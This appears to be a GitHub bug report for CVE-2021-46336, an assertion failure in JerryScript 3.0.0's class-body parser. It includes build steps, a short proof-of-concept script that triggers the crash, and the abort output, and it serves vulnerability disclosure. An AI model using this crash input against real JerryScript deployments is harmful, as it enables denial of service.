Headline
CVE-2021-46336: Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class_body):656. · Issue #4927 · jerryscript-project/jerryscript
There is an Assertion ‘opts & PARSER_CLASS_LITERAL_CTOR_PRESENT’ failed at /parser/js/js-parser-expr.c(parser_parse_class_body) in JerryScript 3.0.0.
JerryScript revision
Commit: a6ab5e9
Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
Test casepoc.js
function assert(a, b) {
if (a != b)
throw "FAIL";
}
function JSEtest(script) {
try {
eval(script);
} catch (e) {
return e;
}
}
assert(JSEtest("class C1 { async;constructor() { } }"), "SyntaxError: Cannot declare an async method named 'constructor'.");
assert(JSEtest("class C1 { *constructor() { } }"), "SyntaxError: Cannot declare a generator function named 'constructor'.");
assert(JSEtest("class C1 { async *constructor() { } }"), "SyntaxError: Cannot declare an async generator method named 'constructor'.");
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion ‘opts & PARSER_CLASS_LITERAL_CTOR_PRESENT’ failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class_body):656. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 31519 abort jerry poc.js
Credits: Found by OWL337 team.